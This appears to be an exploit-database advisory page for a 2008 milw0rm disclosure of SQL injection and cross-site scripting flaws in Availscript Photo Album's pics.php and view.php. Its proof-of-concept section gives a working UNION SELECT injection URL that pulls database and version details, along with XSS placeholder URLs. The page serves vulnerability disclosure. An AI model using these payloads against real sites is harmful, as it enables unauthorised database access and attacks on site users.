Availscript Photo Album (pics.php) Multiple Vulnerabilities

vendor:

Photo Album

by:

sl4x.xuz

7.5

CVSS

HIGH

SQL Injection, Cross Site Scripting

89, 79

CWE

Product Name: Photo Album

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Availscript Photo Album (pics.php) Multiple Vulnerabilities

Multiple vulnerabilities exist in Availscript Photo Album, including SQL Injection in the 'sid' parameter of 'pics.php' and Cross Site Scripting in the 'sid' parameter of 'pics.php' and the 'a' parameter of 'view.php'.

Mitigation:

N/A

Source

Exploit-DB raw data:

###########################################################
# 
#        ___    __ __                  __  __            
#       /\_ \  /\ \\ \                /\ \/\ \           
#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
# 
#                                 security breakd0wn!
###########################################################
# 
# Title: Availscript Photo Album (pics.php) Multiple Vulnerabilities
# Vendor: http://www.availscript.com/
# Vulnerable Version: N/A
# Fix: N/A
# 
###########################################################
# 
# c0ntact: sl4x.xuz[at]gmail[dot]com
# d0rk: "muahaha"
# stop lammo
# 
###########################################################

######################
  1. Information
######################
     With this script you can add pictures in categories create album or wallpaper website.

######################
  2. Vulnerabilities
######################
     SQL Injection in "pics.php" in the "sid" parameter.
     Cross Site Scripting in "pics.php" in the "sid" parameter.
     Cross Site Scripting in "view.php" in the "a" parameter.

######################
  3. PoC
######################
     http://localhost/path/pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12--
     http://localhost/path/pics.php?sid=[XSS]
     http://localhost/path/view.php?a=[XSS]

###########################################################

# milw0rm.com [2008-09-09]